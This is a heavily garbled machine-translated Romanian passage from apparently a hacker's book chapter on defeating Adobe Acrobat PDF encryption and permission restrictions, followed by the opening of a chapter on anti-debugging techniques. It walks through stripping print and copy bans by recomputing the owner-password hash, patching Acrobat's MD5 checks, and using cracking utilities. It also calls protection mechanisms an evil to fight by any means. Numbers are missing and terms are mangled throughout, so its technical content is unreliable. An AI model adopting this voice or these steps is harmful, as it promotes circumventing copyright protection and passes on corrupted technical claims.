Sklyarov!Ceea ce Adobe Acrobat promite non -conformiștii Adobe Acrobat acceptă unsistem destul de flexibil, poate fi chiar spus, ramificat, sistem de criptare care vă permite să închideți selectivaccesul atât la funcții individuale (imprimare, editare, alocare și copiere), cât și la întregul fișier Două paroleindependente sunt acceptate-parola de utilizator (parola utilizatorului sau, prescurtată U-parale) și proprietarulproprietarului (parola PWNER sau, prescurtată, o-e-e) Dacă proprietarul proprietarului nu este setat, atunci parola deutilizator este utilizată în schimb, ca de obicei În plus, foarte des ambele parole coincid între ele și, prin urmare,doar una dintre ele este suficientă pentru a lucra cu documentul U-Parolul este utilizat pentru a proteja documentul devizualizarea neautorizată Dacă este instalat, atunci când este deschis fișierul PDF, vom vedea caseta de dialog PASONILDESOMERBILARE cu o solicitare pentru a introduce parola (Fig ) Documentul nu se va deschide până la introducereaparolei corecte Start |"Part three | INFO | I Chl Doc - Microsoft ■ | 'J MultiTran -Phrasa ■ ■ | Adobe Acrobat" : S : Caseta de dialog care furnizează parola utilizatorului pentru a protejadocumentul de partea neautorizată Metode avansate DizAssMitting Fișierele protejate de parola utilizatorului suntcriptate de algoritmi MD /RC destul de fiabil Documentul nu va funcționa Principala metodă de criptare a fișierelor PDF este prezentată în Fig Versiuniletimpurii ale Adobe Acrobat au folosit o criptare de de biți, ușor deschisă printr-un atac al forței brute, sau „bustmut) pe Pentium- Cu toate acestea, începând cu versiunea , a apărut suportul de - de biți, care nu mai suntdeschise cu o coacere stupidă Cu toate acestea, criptoanaliza nu rămâne nemișcată, iar în ultima dată au apărut maimulte atacuri eficiente care deschid cifrul într -un moment acceptabil Mai multe detalii despre ele vor fi descrise maitârziu în acest capitol (a se vedea secțiunea „Atac asupra U-Parol”) Criptare PDF Fig Principiul de bază alcriptării PDF este principalul dezavantaj al parolelor utilizatorului este, desigur, deschiderea acestora După cumștiți, mecanismele de protecție sunt împărțite în două tipuri: scheme bazate pe cunoașterea unor informații secrete saudespre deținerea unui obiect unic ” Protecția Adobe Acrobat aparține primului tip, ceea ce înseamnă că suntem obligațisă distribuim documentul împreună cu cheia, altfel nimeni nu îl poate citi De exemplu, editorul vinde cărți electronicecriptate prin trimiterea unei parole către e-mail Totul pare a fi bun, cu excepția faptului că, dacă cumpărătorul puneparola în acces deschis, atunci toată lumea va putea citi cartea Nu veți purta mult în același timp!Așa că a trebuit sămodific formatul PDF Versiunile recente ale Acrobat susțin o varietate de licențe, certificate și alte mecanismecriptografice Acum, parola nu poate intra doar de pe tastatură, ci și în secret se retrage din fișierul de certificatsau chiar transmite pe internet Aceasta înseamnă că titularul dreptului de autor ne poate forța să mergem pe internet lafiecare deschidere a documentului sau să limităm ora fișierului până la termenul setat Ca opțiune, parola poate figenerată de un dispozitiv electronic (de exemplu, cheia HASP), iar fără ca acesta, documentul nu va fi citit Diversecărți protejate, cum ar fi EVOC, sunt aproximativ așa În ciuda tuturor inovațiilor, decizia lui Adobe nu este încăliberă de deficiențe Întregul accent este că, în căutarea profitului, Adobe nu a revizuit formatul de bază PDF, ci aadăugat doar un nivel suplimentar de criptare (Fig ) Și acest lucru înseamnă că, la un moment dat, U-pararolul estegenerat inevitabil, pe care un hacker îl poate intercepta și aminti!Niveluri suplimentare de protecție vor scădeaimediat Pentru prima dată, acest lucru a fost demonstrat în mod clar prin informații de revizuire despre clasificareamecanismelor de protecție a fost prezentată în capitolul , „Introducere în mecanisme de protecție” Capitolul Demontarea fișierelor altor formate faimosul hacker rus Dmitry Sklyarov la Conferința Defcon din AdobeCorporation, care a investit milioane de dolari în formatul Evook, nu a putut să se înțeleagă cu faptul că el adezvăluit micul ei secret, subminând încrederea editorilor și implicând miliarde de dolari de beneficii nedivizate S -adovedit că formatul Evocs nu este deloc la fel de fiabil pe cât este publicitat și este imposibil să investești îneditura de cărți electronice Cu toate acestea, aceasta este deja o poveste separată Să revenim la subiectul discutat -protecția documentelor Adobe Acrobat Calculul cheii intermediare bazat pe identificatori hardware (ID -uri hardware)care calculează cheia intermediară prin calculul copiei ascunse a cheii documentului Fig Diverse circuite pentruprotecția cărților electronice bazate pe PDF Fig Vizualizarea proprietăților unui document care determină acțiunilepermise cu el cititori interesați pot fi, de asemenea, recomandate să citească Cartea Dmitry Sklyarov: D Sklyarov„Arta protecției și a împiedicării informațiilor” -St Petersburg: BHV-Petersburg, „Detalii despre consecințele pecare acest raport a trebuit să le găsească cu ușurință pe internet Aici, de exemplu, doar câteva link -uri:http://www pcweek ru/ ids , http://security compenta ru/ /, http://www vremya ru/ / / / html Partea IV Metodele avansate DizAssembing -Parol nu împiedică vizualizarea documentului, dar vă permite să controlațipolitica de interdicții, de la care interdicția de alocare/copiere și imprimare este cea mai neplăcută Ceva mai idiotdecât aceste interdicții este chiar dificil de imaginat Este clar că, dacă cineva își propune să pună un fișier PDF,atunci această măsură nu o va opri, dar utilizatorii cinstiți suferă Puteți afla ce restricții sunt impuse acestuidocument vizualizând proprietățile sale Pentru a face acest lucru, selectați opțiunea de securitate a documentelor dinmeniul Fișier Apoi faceți clic pe butonul Setări Afișare din fereastra de securitate a documentului deschis (Fig ) Proprietățile de protecție afișate în această fereastră sunt descrise pe scurt în tabel Tabelul Restricțiile impuse documentelor de formagіia PDF Paramentare Penting (Rematle) Descriere PNNTING (Imprimare)Această opțiune vă permite să setați și să eliminați restricții la imprimarea valorii documentului care nu este permisă(interzisă) blochează complet imprimarea valorii documentului cu rezoluție scăzută (rezoluție scăzută) vă permite să imprimațidocumentul, dar numai cu rezoluție scăzută, ceea ce nu va permite utilizatorilor să recreeze fișierul PDF sursă scanândși recunoscând valoarea pe care o permit pe complet permite utilizatorilor Pentru a imprima documentul fără restricțiide asamblare a documentelor) Dacă această opțiune este permisă (permisă), atunci utilizatorii pot introduce și ștergepaginile documentului, pot crea marcaje și comenzi rapide (miniaturi) Conținut sau extracție (copierea și extragereaconținutului) dacă Această restricție este stabilită (nu alocată), atunci utilizatorii nu pot copia și extrage selectivconținutul documentului (atât text cât și grafic) Extragerea conținutului pentru asamblare (extragerea conținutuluipentru asamblare) Dacă această limitare este eliminată (permisă), utilizatorii pot extrage Orice conținut utilizatpentru a crea paranteze și etichete de comentarii (crearea de comentarii) dacăAceastă restricție nu a fost stabilită(permisă), utilizatorii pot efectua toate acțiunile descrise în opțiunile menționate anterior, precum și să introducăcomentariile lor completarea câmpurilor de formular în document (completarea câmpurilor câmpurilor) dacă aceastărestricție nu este instalată ( Permis), atunci utilizatorul poate completa câmpurile de formulare, dar nu își poate creapropriile forme de semnare (inserția semnăturii digitale) dacă această limitare nu este instalată (permisă), atunciutilizatorul poate introduce semnături digitale de creare a paginilor de plăci TEM Utilizatorii pot crea pagini deșabloane dacă apăsați butonul Show Detalii, puteți afla câteva detalii, de exemplu, că se folosește un RC slab (scăzut)de de biți, iar parola pentru deschiderea unui document (U-Paralle ) nu este instalat și există doar o parolă peProhibition Management (O-Parol), numită și parolă de permisiuni (parolă de restricție) Este posibil să depășiți acesterestricții?Orice ar spune Adobe în căile lor de publicitate, logica hackerului și intuiția sugerează că, dacă documentulpoate fi deschis, atunci acesta îl copiază sau îl aduce în conținutul său este o problemă de tehnologie, deoarece nueste criptat (altfel am putea să -l deschidem?) Urmarea interdicțiilor consacrate este doar o problemă a onestitățiiaplicațiilor care lucrează cu ea și, în niciun caz, o problemă criptografică Cu alte cuvinte, aceste restricții suntaproximativ aceleași cu atributul cititului de pe fișier Nu împiedică înregistrările la nivelul sectorului, ci doarinformează sistemul de fișiere că este mai bine să nu scrieți aici Cu PDF situația este aceeași Adobe Acrobat esteconceput în mod special pentru a nu imprima și copia textul dacă creatorul documentului nu este GPAV Demontațifișierele altor formate Cu toate acestea, vizualizarea utilităților de la producătorii deal treilea party se poate comporta diferit În primul rând, acest lucru se aplică tuturor tipurilor de convertoare (deexemplu, PDF în PS), care „uită” accidental sau deliberat să analizeze atributele interdicțiilor, generând un fișier PSproaspăt copt, cu care puteți face orice (de exemplu , convertiți -l înapoi într -un PDF „curățat”) Puteți scriepropriul dvs utilitate de vizionare (de exemplu, sub Linux există un dime o duzină) Cu toate acestea, istoric,majoritatea utilizatorilor preferă să urmărească fișiere PDF folosind Acrobat Cum se deblochează interdicțiile?Printreutilizatori există o legendă care etapează că există un bit special în cadrul documentului, care este suficient pentru aremedia cu Hiew, apoi toate interdicțiile vor fi eliminate De fapt, acest lucru nu este în întregime adevărat, sau maidegrabă, deloc Există cu adevărat bucăți de interdicție de imprimare/copiere, iar acestea sunt cu adevăratlilieci Întreaga problemă este că sunt utilizate pentru a genera o cheie criptată care este utilizată pentru a descifraobiectele documentului Schimbați cel puțin un bit interzis, iar fișierul PDF va solicita imediat un O-Parol ladeschidere!De unde îl cunoaștem?!O-Parol în sine nu este stocat nicăieri în document, în schimb suma sa de control esteacolo Restaurată O-Parolul original este imposibil de selectat prea mult timp Dar ce ne împiedică să obținem toateinterdicțiile din document și apoi să calculăm noua sumă de control pentru o-paralol?La urma urmei, conținutuldocumentului nu este criptat, așa că pentru a schimba parola pentru a ști că conținutul inițial nu este necesar!Desigur,în Hiew, această operație va fi destul de dificilă (bine, cu excepția faptului că aveți un calculator în cap), darputeți scrie o utilitate specială care va face acest lucru pentru noi sau va folosi o linie principală pregătită,beneficiu deficiența nu este resimțită în ele Modificare Adobe Acrobat În loc să lupți cu un O-Parol în fișierul PDF,poți să-l faci pe acrobat în sine, astfel încât să fie întotdeauna El a alocat și a tipărit totul, indiferent de orice interdicții Acest lucru este foarte ușor de făcut Până la versiunea incluzivă, Adobe nu a luat nicio măsură anti-corer-nici nu a verificat integritatea codului, nici tehnicile anti-aterizare, nici codul criptat Adevărat, începând cu versiunea , au apărut totuși tehnici anti-aterizare, iarcititorul de ebook este protejat de pachetul de curse Intellalock, criptarea codului și contracararea debuggerului, darîncă nu există nicio verificare a integrității Inima protecției este concentrată în jurul funcțiilor MD Update șiMD LNIT, care sunt ușor de găsit în Dizassembler pe constantele caracteristice b, efcdab h, badcfeH și H Hacking Utilizând ecranul print, o interdicție de evidențiere/copiere a imaginilor grafice este ușor de eludatfolosind tasta , apăsând o copie a ecranului în bufferul de schimb Desigur, nu întregul document este copiat,ci doar o pagină deschisă și numai în rezoluția în care este afișat pe ecran (adică, pentru a imprima o diagramăvectorială cu o rezoluție de dpi, încă nu o putem face )Cu toate acestea, în cele mai multe cazuri, acest truc estesuficient În același mod, puteți copia blocurile textului trăgându -le prin OCR (cu excepția cazului în care, desigur,calitatea documentului permite) Deveniți poligloti învață limbi străine!Pe internet există multe traduceri ale cărțilorelectronice, ale căror originale engleze nu sunt disponibile chiar și în rețele de fișiere -sharing!Stii de ce?Da,pentru că luptătorii zeloși împotriva distribuției neautorizate a cărților sunt prea lene să învețe o altă limbă, cuexcepția propriilor lor Deci, dacă nu, de exemplu, un original englez-nu contează, să citim cel puțin în germană, celpuțin în franceză, chiar și în spaniolă!Și, de asemenea, învață chineză și japoneză Acesta antrenează memoria excelentăși extinde orizonturile Partea IV Metode avansate DizAssemble Structura PDF Contră zvonurilor obscure conform căroraPDF este un format sub -marcat, pentru a reduce un cititor de acrobat greoi insuportabil pentru a restabili algoritmulde criptare deloc Amintiți -vă că decriptarea PDF ca format de document portabil - adică formatul documentelortransferate Inițial, a fost dezvoltat ca un standard deschis, care explică popularitatea sa Nu suntem atașați de unfurnizor (Adobe) și putem scrie în mod liber propriile pachete software, deschizând PDF cel puțin pe RS, cel puțin peMAS, cel puțin la stația de lucru Sun Toți algoritmii de criptare sunt documentați și descriși în detaliu înspecificația formatului, care poate fi descărcat gratuit de la Adobe (http://www adobe com/devnet/pdf/pdf referință html) Ca opțiune, puteți analiza textele originale ale oricărui produs OpenSource conceput pentru a vizualizafișierele PDF Nu ar trebui să apară probleme în această etapă Vorbind pe scurt, fișierul PDF este o structură deinginerie destul de complicată de următorul tip: :: = Titlul(antetul) descrie diverse informații oficiale și nu prezintă un interes deosebit, dar dosarul fișierului (corp) artrebui să fie luat în considerare mai detaliat Este format dintr -o secvență de obiecte (obiect) identificate de douănumere - numărul obiectului (numărul obiectului) și numărul de generare (numărul de generare) Pe plan intern, obiecteleconstau din date de flux și dicționar în flux Dicționarul descrie atributele datelor, explicând programul devizualizare, care este un conținut specific: imagine grafică, text sau fonturi, indică dacă sunt criptate sau nu, șidacă sunt criptate, atunci prin care algoritm, etc (Tabel de referință încrucișată) Conectează numerele de obiecte cupoziția lor în fișier și este întotdeauna stocat într -o stare neîncetată Schematic Structura fișierului PDF esteprezentată în lista Escilând Reprezentarea schematică a structurii fișierului ROE :: = Ccross -Reference Tabel> :: = { } : : :: ( |<> ) Următoarele tipuri sunt acceptate: constante booleane, numere (numeric), link -uri la obiecte (Referințăobiect), nume (nume), șiruri (șir ) și fluxuri (flux) Fluxurile încep cu cuvântul cheie al fluxului și se termină cucuvântul cheie Endtream, iar datele binare sunt amplasate între ele Să deschidem orice document din Hiew pentru a legăsi (Fig ) Liniile pot fi literale (adică constând din caractere tipărite), fie hexadecimal Liniile literale suntîn paranteze rotunde: (aceasta este o linie literală), iar hexadecimalul - în colț: Liniile și fluxurile pot fi criptate, iar restul tipurilor de date nu sunt Numeleîncep cu o linie oblică înclinată, aceeași care este împărțit la cataloage din Unix (de exemplu, /ThisIsName), legăturile cu obiecte sunt indicate de o pereche denumere-numărul obiectului /generației, urmat de cuvântul cheie r (de exemplu, despre R) Diferite tipuri de date potfi combinate într -un tablou (Aggau) sau un dicționar Matricea este încadrată de paranteze pătrate (de exemplu, [ despre R /XYZ NULI]), iar dicționarul cu „citate tipografice” (de exemplu, „ /nume (vall) /nume /val ”) Aceasta esteo informație minimă pe care trebuie să o cunoașteți pentru lucrări cu nivel scăzut cu documentul PDF Principalele tipuride date sunt descrise pe scurt în tabel Bine!Suntem destul de profund împiedicați în teorie, este timpul să începemexerciții practice Luați orice fișier PDF (permiteți-l să fie pentru certitudine http://www encode-sec com/pdfzesp pdf) și încărcați-l în editorul nostru hexadecimal preferat GPAVA Demontați fișierele altor formate Fig Cercetare Format PDF în Tabelul Editorul Hex Principalele tipuri de date utilizate în tipul de date PDFExemplu Boolean Adevărat Numeric Referință obiect R NAME /PROCSET STRING (Cuprins) * Stream {Binary Data}* Array [ R /XYZ NULI] Dicționar " /namel (VALLL) /NAME /VAL , ca orice alt PDF, conține „Dicționarul final”, care,la rândul său, conține legături cu cele mai importante obiecte ale documentului, inclusiv dicționarul de criptare), careeste prezent În orice criptat Fișier PDF și fără de care fișierul nu poate fi deschis sau citit În ciuda numelui său,dicționarul final din document poate fi localizat în orice poziție (atât început, cât și sfârșit) Este ușor de găsitprin trailerul cu cuvinte cheie, care se află la începutul său (în cazul nostru, este localizat în conformitate cudeplasarea ih), iar apoi sunt urmate paranteze tipografice ”, simbolizând dicționarul în sine Să ne uităm la ce avemacolo?Conținutul aproximativ al dicționarului final al documentului criptat PDF este prezentat în lista ParteaIV Metode avansate de dizassembing Conținutul aproximativ al dicționarului final al documentului criptat POFTRAIIIR /SIZE % Numărul de obiecte din fișier /info R % Link la INFO /ENCRYPT R pentru DicționarulCosteum /Root R % Obiect de petrecere / RGE % ID este un identificator de obiect opțional /ID[ ] vedem un link către numărul : /Encrypt despre RA (în alt PDFS Bine!Îl vom căuta cu Hiew (listarea ) Listarea Dicționar de criptare care descriealgoritmul și atributele cifrului oz /filtru /standard /v /r /o (și \ pa Endobj câmp cu numele /filtrulSetează numele descriptorului de siguranță care determină algoritmul de criptare În mod implicit, este/standard, însă,în prezența pluginurilor, sunt acceptate alte filtre, din care aș dori mai întâi să notez următoarele: □ ROTL dezvoltatde noul Paradigm Resources Group (http://www nprg com )O copie costă USD □ FILEOPEN - Un filtru dezvoltat deFileoPen Systems (http://www fileopen com) Costul licenței este de USD □ Softlock dezvoltat de SoftLock Services(http://wwww softlock net) ROTL este prea scump și, în același timp, nu merită în mod clar banii pe care îi solicită,deoarece toate tastele pot fi ușor detectate printr -o căutare contextuală banală pe corpul pluginului Filtrul FileoPeneste poziționat de dezvoltatorii săi drept „o soluție matură și sigură pentru publicațiile electronice („ soluțiecompletă și sigură a e-puțingului ”) De fapt, acest lucru este departe de caz Filtrul Fileopen Editura Versiunea acriptat toate documentele folosind un Cheie unică care a fost stocată direct în corpul pluginului, nu am putut aveaniciun secret pentru hackeri Începând cu versiunea , Fileopen Publisher a început să utilizeze tastele înlocuibile Cu toate acestea, documentul criptat stochează toate informațiile necesare pentru restabilirea instantanee a celor Cheiesecretă Softlock Services Filter este puțin mai departe, astfel încât, pe măsură ce identificatorul de număr SoftLockldfolosește criptarea, parola introdusă de utilizator trebuie să respecte identificatorul secret al documentului deschisPDF Cărți rupte, deci Ei continuă să le rupă!Cu o lungime eficientă a parolei de de lilieci, chiar și pe computere cu o frecvență de ceasmai mică de GHz, este deschisă cu o „stupidă” busting de GPAV Demontați fișierele altor formate timp de dezile și când se utilizează Optimizat Algoritmii sunt aproape instantaneu Deci nu există prea mult sens în toate filtrelecare nu sunt standard În orice caz, deocamdată cu toate acestea, în marea majoritate a cazurilor, se folosește unfiltru de tip standard, iar toate celelalte sunt extrem de rare Câmpul /ѵ descrie algoritmul utilizat de filtrul decriptare Același filtru poate utiliza mulți algoritmi diferiți, iar acest câmp vă permite să specificați celnecesar Filtrul standard folosește următoarele valori: □ - Algoritmul nu este documentat și nu mai este acceptat □ -Algoritmul de criptare deschisă cu o lungime cheie de de biți, de bază pentru toate documentele PDF □ - În modsimilar cu valoarea anterioară - același algoritm, dar cu o lungime cheie de peste de biți Utilizat în PDF , + □ -Un algoritm îmbunătățit nedocumentat cu o lungime cheie de la la biți, utilizat în PDF , + Subcommentat estecauzat de restricții de export în domeniul criptării Câmpul /r indică revizuirea (subiectul) algoritmului de criptare Înspecial, versiunea ( /ѵ ) acceptă numai auditurile numărul și Câmpul /lungimea setează dimensiunea cheii decriptare în biți (numărul trebuie să fie multiplu ) În acest caz, lungimea cheii de criptare este de , adică sefolosește o criptare pe de biți conform algoritmului de bază Desigur, toate aceste câmpuri sunt de natură purinformativă și nu ar trebui schimbate De la faptul că vom reduce lungimea cheii de la de biți la, să zicem, ,decriptarea documentului nu va deveni mai ușoară Câmpul /O este o linie de de biți generată pe baza O- șiU-Paralele Aceasta nu este o parolă în sine, ci doar hash -ul său obișnuia să verifice corectitudinea paroleiproprietarului /Și este o linie diferită de de biți generată pe baza U-Parol și utilizată pentru a verificacorectitudinea parolei de utilizator Un câmp /R este un steag de de biți responsabil pentru accesarea documentului,adică pentru distribuirea permiselor și interdicțiilor Exact asta avem nevoie!Fiecare bit, numerotat secvențial de la la (cel mai puțin semnificativ bit se află la o adresă mai mică, adică totul este exact același ca în arhitecturax ), fiind aruncat la zero, interzice o anumită acțiune O scurtă descriere a bițiilor acestui steag și a drepturilor deacces la documentul reglementat de acesta sunt date în tabel Dar dacă încercați să instalați toate liliecii peunitate, primind maximul autorității și retrageți toate interdicțiile?Indiferent cât de!Nimic nu va funcționa!Câmpul /rse încadrează sub călcâiul Hesh-Summa, algoritmul de generație al cărui algoritm de generație va fi examinat pe scurtpuțin mai departe Între timp, vom reveni la documentul nostru și vom vedea ce restricții sunt impuse P -Flag conține ovaloare de - (minus ), care în reprezentarea hexadecimală este egală cu FFC H Dacă transferim acest număr într -oformă binară, vom primi Acum vom încerca să realizăm ce înseamnă acest număr Două bătălii dreapta suntzero, așa cum ar trebui să fie Al treilea bit permite imprimarea (iar sigiliul este cu adevărat permis), dar toatecelelalte operații (inclusiv copierea textului în clipboard) sunt strict interzise Tabelul Numirea unei operațiunide setare a bițiului R-Flag care au voie să facă o descriere - față de documentul protejat al bițiului PDF și artrebui să fie egală cu Sigiliul documentului începând de la Revizia , calitatea de imprimare depinde de setare dinBIT Modificarea documentului folosind operațiuni, excelent de la controlat de lilieci , și ParteaIV Metode avansate DizAssemble Tabelul (final) Bit Descriere Configurarea și modificarea câmpurilor interactiveformularele (inclusiv câmpul de semnătură) - sunt rezervate și ar trebui să fie egale cu începând de la revizuirea -completarea câmpurilor existente ale formelor interactive, chiar dacă bitul este scăzut cu extracția textului șigrafică cu utilizatori cu viziune scăzută Pornind de la revizuirea - Ansamblul documentului (inserție, ștergere,rotație a paginilor și crearea de marcaje), chiar dacă bitul este abandonat documente de imprimare cu o rezoluțiescăzută de - sunt rezervate și o generație de criptare a generației de chei de criptare ar trebui să fie egală-aceasta este un proces cu mai multe etaje O descriere detaliată a algoritmului de criptare poate fi găsită înspecificația la formatul PDF, pe care l -am dat deja Aici, acest proces va fi luat în considerare doar pe scurt LuămU-pararalul și îi facem lungimea egal cu exact de octeți Cu alte cuvinte, dacă lungimea parolei este mai mare de de octeți, atunci se folosesc doarprimii de octeți Dacă lungimea U-Parol este mai mică de de octeți, aceasta este completată de de octețifolosind cantitatea potrivită de octeți suplimentari preluate de la începutul liniei următoare, cu greu scrisă în corpulacrobat: H BFH EH EH H H H H H EH H H H H H FFH FAH OLH H EH EH OOH B H DOH H EH H FHOCH A H H H H Cu alte cuvinte, dacă lungimea parolei este n byt (n /U "Endobj, rețineți că câmpurile /o și /și câmpurilesunt un tablou hexadecimal (specificația PDF permite, dar nu toate pdf-flaw-urile sunt ghicite) Deschideți un astfel defișier cu utilitatea preferată și vedeți ce se va întâmpla!Dar recuperarea parolei PDF SOM SDK, spre deosebire demajoritatea utilităților similare, face față acestei sarcini excelente!În plus, acesta nu este un „lucru în tine” (ca unfișier exe), și anume SDK Cu alte cuvinte, acesta este un set de dezvoltator potrivit pentru încorporarea în propriileaplicații scrise pe C, Delphi sau Visual Basic Aceasta este o abordare cu adevărat hacker a afacerii!Adevărat, la fel catoate celelalte programe, recuperarea parolei PDF a văzut că SDK costă bani, iar versiunea demonstrativă economiseștedoar jumătate din pagini O serie de utilități funcționează într -un principiu complet diferit În loc să-și dea seama depropriul decodificator PDF, deschid fișierul PDF (sau cartea electronică) prin Internet Explorer și „Rob” decodateconținut într-un fișier PDF separat, fără toate tipurile de restricții Desigur, nu sunt capabili să hack un U-Parolnecunoscut, cu toate acestea, pot, de exemplu, „să dezlege” cartea electronică a formatului EVOC de pe Internet, dacăprotecția sa primește în secret parola prin rețea Marea majoritate a eliminării PDF nu acceptă filtre de criptare de lafurnizorii terți (cum ar fi Fileopen, Softlock) Scrie -ți propriile utilități pentru deschiderea lor!Mecanismele deprotecție care limitează libertatea de diseminare a informațiilor este un rău necondiționat cu care hackerii ar trebuisă lupte cu orice mijloace disponibile Dar, pe de altă parte, apariția formatului EVOC -urilor a dat naștere interesuluieditorilor pentru distribuirea cărților în formă electronică, iar lumea a primit cărți electronice cu calitateînaltă Prin urmare, este foarte important să observăm un rezonabil Echilibru - Breaking Books astfel încât atât utilizatorii, cât și editorii să fie mulțumiți Este doar puțin să mergiprea departe, iar deținătorii de drepturi de autor vor pierde din nou tot interesul în formatul EVOC În acest caz, tu șicu mine va trebui din nou să scanăm și să recunoaștem cărți de hârtie, care, desigur, nu vom fi pe placulnimănui Partea IV Metode avansate DizAssemble Resurse interesante P "Ebooks Security:Teorie și practică" -Dmitry Sklyarov dedicată hacking-ului documentelor PDF și cărților electronice, prezentate de el laConferința de hackeri def con nouă, - iunie (Alexis Park în Las Vegas, Nevadada SUA), conține o mulțime deinformații tehnice și aparține categoriei de must (în engleză) Din păcate, este dificil să dai o legătură exactă,deoarece fișierul își schimbă constant implementarea Când pregătiți această carte pentru imprimare, acest material afost găsit la următoarele adrese: http://www download ru/defcon ppt șihttp://www wwcn org/~grit/free/defcon elcomsoft pdf P "Cum criptarea PDF folosind" Handler de securitate standard"Adobe funcționează" (http://www cs cmu edu/ ~ dst/adobe/galerie/anon Jul -pdf-encryption txt) -compresed Descriere afundamentelor de bază- Descrierea comprimată a fundamentelor de bază PDF conține un anumit număr de erori șiinexactități, prin urmare, în cursul prezentării este necesară verificarea cu specificația proprie (în engleză) P "AdobePDF Technology Center: PDF Referință" (http://www adobe com/devnet/pdf/pdf reference html) - O specificație propriepentru PDF, conține literalmente totul (în engleză) P PDF Parolă Recuperare SAW SDK Free Download(http://www shareup com/pdf password recuperare com sdk-dondload- html) -Library of hacker funcții pentru a lucracu fișiere PDF criptate (în engleză) □ ElcomSoft (http://www elcomsoft com) - Site -ul oficial al companiei specializatîn hacking diverse documente (în limba rusă și engleză): http://www elcomsoft com Part V Practical Corporal Chapter Anti -landing techniques and a hide and seek for Windows and Linux procedure for hacking protective mechanisms consistsof three main stages: detecting a protective code in hundreds of kilobytes (or even megabytes) of a protectedapplication code, analyzing algoritmul funcționării și hackingului său Toate cele trei etape sunt la fel deimportante De exemplu, fără a analiza principiile mecanismului de protecție, este inutil să încercați să îl hack Putețiclasifica protecția în funcție de tipul de „blocaj” De exemplu, cifrele și protecția crypto se bazează pe a treia etapă- algoritmul activității lor este de obicei disponibil public, bine documentat și, în cazul general, este cunoscut dehacker, dar acest lucru nu facilitează foarte mult hackingul (cu excepția faptului că acesta simplifică ortografia unuiîntreruptor frontal) Mecanismele numerelor de înregistrare, dimpotrivă, se concentrează pe clasificarea algoritmului degenerare și dificultăți în căutarea și analiza în codul programului (încă știind algoritmul, puteți scrie cu ușurință ungenerator de chei) Cu toate acestea, chiar dacă protecția este construită folosind metode criptografice, să spunem,criptează corpurile funcțiilor importante din punct de vedere critic cu o metodă rezistentă cripto -rezistentă folosindo cheie lungă, poate fi „netratată” de la cheie, de exemplu, copierea programului program după decriptare Și mai ușor -pentru a distribui programul cu cheia (tactica obișnuită a piraților) O modalitate de a preveni acest lucru este de apune o legătură criptată la computer în cheie sau de a verifica „curățenia” copiilor prin intermediul internetului Acestlucru se poate face chiar și fără cunoașterea utilizatorului, deși aceasta este considerată o formă proastă Dar ce vainterfera cu hackerul care deține o copie licențiată a programului, pentru a -l descifra cu cheia sa și a eliminaabsolut toate verificările de acolo?Astfel, este recomandabil să poți preveni eficient orice protecție de descoperire șianaliză, contracarată simultan Dizassembler și debugger - principalele instrumente ale crackerului Fără aceasta,protecția nu este protecție În epoca domniei MS-DOS, programele regimului real au dominat care au monopolizatprocesorul, memoria și echipamentul, în orice moment nestingherit în regim sigur și întorcându-se înapoi Debigerii de laacea vreme (încă fragede, slabe, neviabile) au fost ușor înșelați (depuse, agățate) cu tehnici de programare banale careau fost folosite activ prin protecție DizAssemblers la acea vreme curgea cu ușurință într-un stupor din singurul tip decod criptat sau auto-modificat Într -un cuvânt, a fost un adevărat paradis pentru dezvoltatorii de apărare Astăzi totuls -a schimbat În primul rând, nimeni nu va permite programului aplicat pentru Windows să fie deosebit de magistral Acumnu veți accelera în mod special cu regimul protejat Dezvoltatorii de apărare trebuie să folosească instrucțiuni prozaiceneprivilegiate fără să se gândească la diverse trucuri Aceeași mică parte a tehnicilor de protecție care pot funcționaîntr -un astfel de mediu este impusă debuggerilor și dizassemblelor, A cărei putere a crescut semnificativ Suport hardware al depancării în cele + procesoare în colaborare cu modulvirtual de funcționare, instrucțiuni privilegiate și memoria virtuală vă permite să creați debuggeri care practic nu potfi găsiți printr -un program aplicat și chiar mai mult este imposibil să obțineți acest lucru controlează asupra lor Partea V Există capacitate practică de cordon de către emulatori, de fapt, mașini virtuale reale care execută în modindependent codul în loc să-l lase pe un procesor „live” În același timp, emulatorul este întotdeauna efectuat în modulde supraveghere chiar și în raport cu codul depanat al inelului zero Apărarea are foarte puține șanse de a găsi undebugger sau de a interfera cu munca sa Și apoi, devine posibil numai dacă emulatorul este implementat cuerori Dizassemblers interactive (de exemplu, IDA Pro) au apărut, de asemenea, care, datorită interacțiunii apropiate cuutilizatorul, poate ocoli orice capcană imaginabilă și de neconceput lăsată de dezvoltator Chiar și la nivelul ineluluizero în Windows, este foarte dificil să ascunzi orice DPI pentru a asigura compatibilitatea cu întregul parc de sistemede operare asemănătoare Windows trebuie să folosească doar oportunități documentate Construirea în protecția Windowseste aceeași cu încercarea de a te pierde în parc Dacă ar exista cel puțin un milion de copaci - toți sunt localizațigeometric corect și abuzat din belșug cu semnele „producția - acolo” Astfel, este foarte dificil să se confrunte custudiul programului în mod fiabil, dacă este posibil Cu toate acestea, multe trucuri împotriva debuggerilor și adizassemblelor sunt pur și simplu interesante în sine și sunt demne de a le lua în considerare în această carte Vechiletehnici anti -canalizare pentru Windows într -un mod nou, așa cum am menționat anterior, metodele de hacking mecanismede protecție (cu excepția, poate, metode de protecție criptografică) în practică sunt reduse la detectarea codului deprotecție și la analizarea principiilor funcționării sale Astăzi, nu există metode fiabile pentru prevenirea uneianalize a codului de protecție Notă O descriere detaliată a mecanismelor anti -deliere ar necesita o carte separată Oatenție deosebită este acordată tehnicilor anti-landare din cartea „Tehnica programelor de depanare fără texteinițiale”, fragmente cheie din care sunt realizate pe CD, care este inclusă în această carte în directorul : \parto \ Ch \ suplimentar În acest capitol, se va face o încercare că noul este doar unul vechi Tehnicile anti-aterizare din timpul MS-DOS și COT de depanare (Fig ) se întorc din nou la lucru în Windows /XP/ Materialele prezentate în această secțiune nu numai că vă vor provoca interes ritual și non-nostalgic, darvor servi, de asemenea, ca manual practic pentru combaterea hackerilor și debuggerilor Orez Debugger antic dedebug com Chris Kaspersky "Tehnica programelor de depanare fără texte inițiale "-St Petersburg: BHV-Petersburg, GPAVA Tehnici anti-aterizare și o ascunzătoare și căutați Windows șiLinux (și debuggerul, după cum știți, principalul instrument alhackerului) au mers pe o cale evolutivă îndelungată În acest timp, au fost găsite multe moduri de a face față cu ele,dar nu toate au avut succes Recent, a existat o deficiență acută de tehnici anti -deliere bune Deci este timpul să văîntoarceți la origini - tehnici antice, dovedite ani de zile?Progresul tehnic se dezvoltă într-o spirală, iar metodelede protecție dezvoltate pentru MS-DOS și și-au pierdut relevanța până la sfârșitul existenței sale au un efect ucigătorasupra Windows-Layers, care pur și simplu nu au asigurat o astfel de transformare a 